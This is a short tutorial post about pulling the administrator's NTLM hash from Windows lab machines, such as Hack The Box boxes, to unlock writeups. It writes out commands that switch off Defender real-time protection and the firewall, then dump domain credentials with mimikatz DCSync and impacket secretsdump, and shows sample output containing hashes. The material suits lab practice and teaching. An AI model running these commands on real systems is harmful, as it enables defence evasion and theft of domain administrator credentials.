Preface: If you want to decrypt a writeup for an active Windows box on HTB or another platform using the NTLM hash of the administrator user, you are in the right place. In this how-to post I will show you how to extract the NTLM hash of the administrator user (and probably of any other user) on Windows machines.
First we will use mimikatz. In the second example I show you how to use secretsdump for it.
Using mimikatz
After getting a shell as administrator you can follow the steps below to extract the NTLM hash.
First, disable real-time protection if it is enabled:
Set-MpPreference -DisableRealtimeMonitoring $true
Then turn off the Windows Firewall for the current profile (this is what the netsh command below does; it does not touch the antivirus itself):
netsh advfirewall set currentprofile state off
Then run mimikatz with the following arguments:
./mimikatz.exe "lsadump::dcsync /user:administrator"
You will get an output like this:
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"
.#####. mimikatz 2.2.0 (x86) #18362 Feb 8 2020 12:26:09
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2020 9:14:15 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff.
Just copy paste it in the writeup where it is asked for.
Using secretsdump
If you have owned a machine and you have the password of the administrator user, you can get the NTLM hash using secretsdump. secretsdump.py is part of the impacket examples; the -just-dc-ntlm option makes it pull only the NTLM hashes from the domain controller's NTDS.DIT over DRSUAPI (the same DCSync replication call mimikatz uses above), so the target IP must be a domain controller.
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
Each credential line follows the layout shown in the banner, domain\uid:rid:lmhash:nthash: the account name, its RID (500 for the built-in Administrator), then the LM hash and finally the NT (NTLM) hash. The LM value aad3b435b51404eeaad3b435b51404ee is the well-known hash of an empty password and simply means no LM hash is stored.
Here we got the NTLM hash, which is d9485863c1b9e07543aa40cbb4ab9dfd.
Just copy paste it in the writeup where it is asked for.